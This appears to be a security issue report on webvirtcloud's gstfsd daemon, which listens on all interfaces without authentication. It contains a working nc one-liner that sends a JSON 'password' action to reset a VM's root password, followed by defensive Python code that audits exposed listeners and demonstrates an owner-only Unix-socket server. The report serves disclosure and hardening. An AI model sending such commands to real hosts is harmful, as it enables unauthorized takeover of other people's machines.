Open
Description
Hi
Then, following installation, gstfsd is launched by supervisor and binds to 0.0.0.0:16510. Hence it seems to me that anyone on the internet can send a JSON message and change a VM root password by doing so:
$ echo '{"action": "password", "passwd": "$6$kgPoiREy$bYmXufC9QXG8ORp1uYuH9wJ1n4CwoWmTsQqf6sikFTMlSBsgrt4mqO8qMzM1jQMboPtAAFQvrSXGHNXul4mBr1", "vname": "test"}' | nc 192.0.2.1 16510
{"return": "success"}
If so, it seems to me that this is a major security issue. gstfsd should at least bind to 127.0.0.1 and in fact, it should bind to a unix socket and only webvirtcloud should be allowed to talk to it.
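The two points of the report, a control-channel daemon exposed on a wildcard address and the suggested fix of confining it to a Unix socket, can be checked and demonstrated in a few lines. The following is an added example and not gstfsd's or webvirtcloud's own code: the first part audits constructed `ss -Hlntp`-style output (sample lines, not captured from a real host) for listeners reachable beyond the machine; the second part is a minimal hypothetical JSON server bound to a Unix socket whose file is created with mode 0600 so that only the owning user (the account webvirtcloud runs as, under this assumption) can connect. The `ping` action and the socket path are placeholders, not gstfsd's protocol.

```python
import ipaddress
import json
import os
import socket
import stat
import tempfile
import threading

# Constructed sample in the shape of `ss -Hlntp` output (not from a real host).
SAMPLE_SS_OUTPUT = """\
LISTEN 0 128 0.0.0.0:16510 0.0.0.0:* users:(("gstfsd",pid=1234,fd=3))
LISTEN 0 128 127.0.0.1:6080 0.0.0.0:* users:(("novncd",pid=1235,fd=4))
LISTEN 0 128 [::]:22 [::]:* users:(("sshd",pid=800,fd=3))
"""

WILDCARDS = {"0.0.0.0", "::", "*"}


def is_exposed(addr):
    """True if a listener bound to this address is reachable from off-host."""
    if addr in WILDCARDS:
        return True
    try:
        return not ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return True  # unrecognised form: treat as exposed rather than hide it


def parse_ss(text):
    """Parse ss -Hlntp style lines into (address, port, process) tuples."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        addr, _, port = fields[3].rpartition(":")
        addr = addr.strip("[]")  # [::]:22 -> ::
        proc = None
        for field in fields[4:]:
            if field.startswith("users:"):
                proc = field.split('"')[1]
        rows.append((addr, int(port), proc))
    return rows


def exposed_listeners(text):
    """Listeners an administrator should review: bound to a non-loopback address."""
    return [row for row in parse_ss(text) if is_exposed(row[0])]


def serve_json_unix(path, handler, ready, result):
    """Hardened variant: answer one JSON request on an owner-only Unix socket."""
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    old_umask = os.umask(0o177)  # socket file is created 0600, no race window
    try:
        srv.bind(path)
    finally:
        os.umask(old_umask)
    os.chmod(path, 0o600)  # belt and braces on platforms that ignore umask here
    result["mode"] = stat.S_IMODE(os.stat(path).st_mode)
    srv.listen(1)
    ready.set()
    conn, _ = srv.accept()
    with conn:
        request = json.loads(conn.recv(4096).decode())
        conn.sendall(json.dumps(handler(request)).encode())
    srv.close()
    os.unlink(path)


def unix_roundtrip(request):
    """Run the hardened server once; return (reply, socket file mode)."""
    path = os.path.join(tempfile.mkdtemp(), "gstfsd-example.sock")  # placeholder path
    ready = threading.Event()
    result = {}

    def handler(req):  # placeholder action set, not gstfsd's real protocol
        return {"return": "success" if req.get("action") == "ping" else "error"}

    thread = threading.Thread(target=serve_json_unix,
                              args=(path, handler, ready, result))
    thread.start()
    ready.wait(5)
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as client:
        client.connect(path)
        client.sendall(json.dumps(request).encode())
        reply = json.loads(client.recv(4096).decode())
    thread.join(5)
    return reply, result["mode"]


if __name__ == "__main__":
    for addr, port, proc in exposed_listeners(SAMPLE_SS_OUTPUT):
        print(f"review: {proc} listens on {addr}:{port}")
    print(unix_roundtrip({"action": "ping"}))
```

Running the audit against real `ss -Hlntp` output on a webvirtcloud host is the quick way to confirm whether gstfsd is still on 0.0.0.0; with the Unix-socket design the filesystem permission, not a network ACL, decides who may talk to the daemon.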